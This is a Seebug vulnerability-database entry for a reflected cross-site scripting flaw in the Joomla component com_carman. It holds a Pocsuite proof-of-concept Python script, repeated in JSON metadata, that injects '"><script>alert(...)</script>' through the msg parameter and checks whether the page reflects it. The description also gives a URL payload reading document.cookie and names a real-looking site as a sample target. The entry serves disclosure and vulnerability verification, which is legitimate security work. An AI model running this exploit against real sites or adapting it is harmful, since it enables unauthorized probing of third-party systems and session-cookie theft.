ID SSV:18676
Type seebug
Reporter Root
Modified 2009-12-24T00:00:00
Description
No description provided by source.
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
vulID = '18676' # ssvid
version = '1.0'
author = ['kikay']
vulDate = '2009-12-24'
createDate = '2016-01-21'
updateDate = '2016-01-21'
references = ['http://www.sebug.net/vuldb/ssvid-18676']
name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
appPowerLink = 'http://www.joomla.org'
appName = 'Joomla!'
appVersion = 'N/A'
vulType = 'XSS'
desc = '''
Joomla组件com_carman由于参数msg过滤不严格,导致出现反射性XSS漏洞。
该漏洞利用的POC格式如下:
http://XXX/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>
该漏洞在Firefox浏览器下利用与验证的效果截图如下所示:
(1)http://pan.baidu.com/s/1c0OnfWk
(2)http://pan.baidu.com/s/1skl3ifb
'''
samples = ['http://carrentalsltd.com']
def _attack(self):
return self._verify()
def _verify(self):
#验证漏洞
result = {}
#特征字符串
strxss="<0x!Q_az*^~>"
#构造XSS验证的payload
payload='"><script>alert(/'+strxss+'/)</script>'
#漏洞访问地址
exploit='/index.php?option=com_carman&msg='
#自定义的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive',
"Content-Type": "application/x-www-form-urlencoded"
}
#构造访问地址
vulurl=self.url+exploit+payload
#访问
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#判断返回结果
if resp.status_code==200 and '<script>alert(/'+strxss+'/)</script>' in resp.content:
#漏洞验证成功
result['VerifyInfo']={}
result['VerifyInfo']['URL'] =self.url+exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
{"href": "https://www.seebug.org/vuldb/ssvid-18676", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2009-12-24T00:00:00", "title": "Joomla Component com_carman Cross Site Scripting Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18676", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2009-12-24T00:00:00", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '18676' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2009-12-24'\r\n createDate = '2016-01-21'\r\n updateDate = '2016-01-21'\r\n references = ['http://www.sebug.net/vuldb/ssvid-18676']\r\n name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'\r\n appPowerLink = 'http://www.joomla.org'\r\n appName = 'Joomla!'\r\n appVersion = 'N/A'\r\n vulType = 'XSS'\r\n desc = '''\r\n Joomla\u7ec4\u4ef6com_carman\u7531\u4e8e\u53c2\u6570msg\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u51fa\u73b0\u53cd\u5c04\u6027XSS\u6f0f\u6d1e\u3002\r\n \r\n \u8be5\u6f0f\u6d1e\u5229\u7528\u7684POC\u683c\u5f0f\u5982\u4e0b\uff1a\r\n http://XXX/index.php?option=com_carman&msg=\"><script>alert(document.cookie)</script>\r\n\r\n \u8be5\u6f0f\u6d1e\u5728Firefox\u6d4f\u89c8\u5668\u4e0b\u5229\u7528\u4e0e\u9a8c\u8bc1\u7684\u6548\u679c\u622a\u56fe\u5982\u4e0b\u6240\u793a\uff1a\r\n \uff081\uff09http://pan.baidu.com/s/1c0OnfWk\r\n \uff082\uff09http://pan.baidu.com/s/1skl3ifb\r\n '''\r\n samples = ['http://carrentalsltd.com']\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def _verify(self):\r\n #\u9a8c\u8bc1\u6f0f\u6d1e\r\n result = {}\r\n #\u7279\u5f81\u5b57\u7b26\u4e32\r\n strxss=\"<0x!Q_az*^~>\"\r\n #\u6784\u9020XSS\u9a8c\u8bc1\u7684payload\r\n payload='\"><script>alert(/'+strxss+'/)</script>'\r\n #\u6f0f\u6d1e\u8bbf\u95ee\u5730\u5740\r\n exploit='/index.php?option=com_carman&msg='\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive',\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n #\u6784\u9020\u8bbf\u95ee\u5730\u5740\r\n vulurl=self.url+exploit+payload\r\n #\u8bbf\u95ee\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u5224\u65ad\u8fd4\u56de\u7ed3\u679c\r\n if resp.status_code==200 and '<script>alert(/'+strxss+'/)</script>' in resp.content:\r\n #\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f\r\n result['VerifyInfo']={}\r\n result['VerifyInfo']['URL'] =self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "id": "SSV:18676", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T18:20:07", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T18:20:07"}, "dependencies": {"references": [], "modified": "2017-11-19T18:20:07"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "references": []}
{}